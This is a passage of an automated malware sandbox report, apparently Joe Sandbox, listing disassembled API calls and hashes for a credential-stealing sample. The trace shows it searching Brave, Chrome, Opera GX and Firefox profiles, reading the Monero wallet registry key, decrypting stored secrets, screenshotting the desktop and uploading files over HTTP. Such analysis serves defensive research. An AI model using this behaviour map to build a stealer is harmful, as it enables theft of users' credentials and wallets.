                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,00000000,?,00426824,?,?,?,00426517), ref: 0041567B
                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00415693
                                                                                            • Part of subcall function 00410F12: CreateFileA.KERNEL32(004156A7,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,004156A7,00000000), ref: 00410F2D
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000), ref: 004156C6
                                                                                          • strtok_s.MSVCRT ref: 004156E1
                                                                                          • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                          • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$H_prologlstrcatlstrcpymemsetwsprintf$Find$Deletestrtok_s$CloseCopyCreateFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                          • API String ID: 2774496700-332874205
                                                                                          • Opcode ID: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                          • Instruction ID: ca9661dadf250ee48b6985f068276dcce33099c5ed12ff06a98e026076f1a7f9
                                                                                          • Opcode Fuzzy Hash: d20dc5bdacd583ed27b03aefafc9fd92c8039eee4d847269b8182252768ee144
                                                                                          • Instruction Fuzzy Hash: F2C160B1D0015DEEDF20EBE4DC45EDEBBBCAB08304F50406AF519A3191DB389A49CB65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                                          • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                                          • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                                          • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                                            • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                          • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                          • API String ID: 3869166975-1816240570
                                                                                          • Opcode ID: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                          • Instruction ID: 88dffd7cdbcf1f4ae3e67456db78224bf6b474b6b2878ab6084e2e33bf0d65cc
                                                                                          • Opcode Fuzzy Hash: 9804cbcb6549636e7edce159aa3ee5a2d29b2506f6b57e35bae4b86771403b22
                                                                                          • Instruction Fuzzy Hash: 67826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174CCB66

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004162B4
                                                                                          • wsprintfA.USER32 ref: 004162D4
                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                          • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                          • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                          • wsprintfA.USER32 ref: 00416346
                                                                                          • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                          • wsprintfA.USER32 ref: 00416374
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          • wsprintfA.USER32 ref: 00416388
                                                                                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                          • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                          • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                          • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                          • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004164DD
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0041655B
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                          • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                          • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                          • Associated: 00000001.00000002.2042878342.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$lstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocCopyDeleteFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                          • API String ID: 3378981913-445461498
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00411302
                                                                                          • memset.MSVCRT ref: 00411328
                                                                                          • GetDesktopWindow.USER32 ref: 0041135E
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                          • GetDC.USER32(00000000), ref: 00411372
                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                          • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                          • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                            • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                            • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                            • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                          • DeleteObject.GDI32(?), ref: 004114B3
                                                                                          • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                          • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                          • String ID: image/jpeg
                                                                                          • API String ID: 3067874393-3785015651
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 00401167
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                          • StrCmpCA.SHLWAPI(?,00422378), ref: 004013CA
                                                                                          • StrCmpCA.SHLWAPI(?,0042237C), ref: 004013E4
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00422388,?,?,?,00422384,?,?,?,00422380,?,?), ref: 00401510
                                                                                            • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0042238C), ref: 004017EE
                                                                                          • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,0042238C), ref: 00401832
                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,0042238C), ref: 00401841
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401767
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                            • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                            • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                            • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                            • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                            • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401AFE
                                                                                            • Part of subcall function 0040618B: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00422366), ref: 00401B85
                                                                                            • Part of subcall function 00414437: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004144C0
                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00401BD4
                                                                                          • FindClose.KERNEL32(?), ref: 00401BE5
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                            • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                            • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                            • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                            • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$H_prolog$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                          • String ID: 7$\*.*
                                                                                          • API String ID: 1164748634-4165053604
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 0040B468
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F10,?,?,00425BEF,?,00000000,?), ref: 0040B4E7
                                                                                          • StrCmpCA.SHLWAPI(?,00425F14,?,00000000,?), ref: 0040B50B
                                                                                          • StrCmpCA.SHLWAPI(?,00425F18,?,00000000,?), ref: 0040B525
                                                                                          • StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F1C,?,?,00425BF2,?,00000000,?), ref: 0040B5C1
                                                                                            • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                            • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B6C6
                                                                                          • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040B79B
                                                                                          • FindNextFileA.KERNELBASE(?,?,?,00000000,?), ref: 0040B84A
                                                                                          • FindClose.KERNEL32(?,?,00000000,?), ref: 0040B85B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileH_prologlstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
                                                                                          • String ID: prefs.js
                                                                                          • API String ID: 2318033617-3783873740
                                                                                          • Opcode ID: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                          • Instruction ID: ee987ab292ce5c8f0602a9b5561e4dc2d57f8a603593be12f89c118a2121006c
                                                                                          • Opcode Fuzzy Hash: 5d5855e90322f171bdcc3e902ad36419314a4be2ab95842e86b6b9ed6f14b737
                                                                                          • Instruction Fuzzy Hash: D5D18471900248EADB14EBE5C956BDDBBB4AF19304F5040BEE409B36C2DB785B4CCB66
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004094EA
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425DC4,?,?,00425BA2,?), ref: 00409567
                                                                                          • StrCmpCA.SHLWAPI(?,00425DC8), ref: 00409584
                                                                                          • StrCmpCA.SHLWAPI(?,00425DCC), ref: 0040959E
                                                                                          • StrCmpCA.SHLWAPI(?,00000000,?,?,?,00425DD0,?,?,00425BA3), ref: 00409635
                                                                                          • StrCmpCA.SHLWAPI(?), ref: 004096B6
                                                                                            • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00408759: _EH_prolog.MSVCRT ref: 0040875E
                                                                                            • Part of subcall function 00408759: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408841
                                                                                          • FindNextFileA.KERNELBASE(00000000,?), ref: 0040989F
                                                                                          • FindClose.KERNEL32(00000000), ref: 004098AE
                                                                                          Similarity
                                                                                          • API ID: H_prologlstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 322284088-0
                                                                                          • Opcode ID: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                          • Instruction ID: 4c01649d4d81a67c5449674785cae23a0a495e6994ebb05e8901edf346d892d0
                                                                                          • Opcode Fuzzy Hash: c7d6cc988ba782d8cbd6a4dc9e280d496fe71cb906df9d5859f326619e4a8ed7
                                                                                          • Instruction Fuzzy Hash: 23C17270900249EADF10EBA5C9167DDBFB8AF09304F10417EE844B36C2DB785B08CBA6
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004111C3
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111E9
                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 004111F9
                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 0041120B
                                                                                          • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0041121F
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00411232
                                                                                          Similarity
                                                                                          • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 186290926-0
                                                                                          • Opcode ID: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                          • Instruction ID: 368edb313bfa2f31f76f5ba6fbd020b911e3fe3703e22c74ac1c99050383bae8
                                                                                          • Opcode Fuzzy Hash: a9f169bdbb2cdc4e9d02c35b7c1d11867838652ed038367759a7d765107c7668
                                                                                          • Instruction Fuzzy Hash: 56015A71900028AFDB119F95DD48ADEBBB9EF86300F204096F505F2220D7788F84CFA5
                                                                                          APIs
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                          • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401056
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                          • String ID:
                                                                                          • API String ID: 3466090806-0
                                                                                          • Opcode ID: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                          • Instruction ID: 832c21bd40a73018163515ce5beef45c93da2aa0da3d8997035a91abaf75a422
                                                                                          • Opcode Fuzzy Hash: a27f42a190018756939c2a186fac89ee64236d1eb1bb3ceecf19bf94991bf119
                                                                                          • Instruction Fuzzy Hash: E2F03A79240208FFEB119F91DC0AFAE7B7AEB45B40F104025FB01AA1A0D7B19A109B24
                                                                                          APIs
                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                                          • LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                                          • LocalFree.KERNEL32(?), ref: 004062FE
                                                                                          Similarity
                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                          • String ID:
                                                                                          • API String ID: 2068576380-0
                                                                                          • Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                          • Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
                                                                                          • Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
                                                                                          • Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50

                                                                                          Control-flow Graph

                                                                                          [Figure: control-flow graph, entry block 4043ad-4044ac; legend: Executed / Not Executed]
                                                                                          APIs
                                                                                          • _EH_prolog.MSVCRT ref: 004043B2
                                                                                            • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                            • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                            • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                            • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                            • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                            • Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                            • Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                            • Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                            • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                          • StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                                                            • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                            • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                            • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                            • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                            • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                            • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                            • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                            • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A40,00000000,?,?,00000000), ref: 00404B42
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404B54
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00404B6D
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404B7F
                                                                                          • memcpy.MSVCRT ref: 00404B92
                                                                                          • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                                                                          • memcpy.MSVCRT ref: 00404BB3
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                                                                          • memcpy.MSVCRT ref: 00404BEA
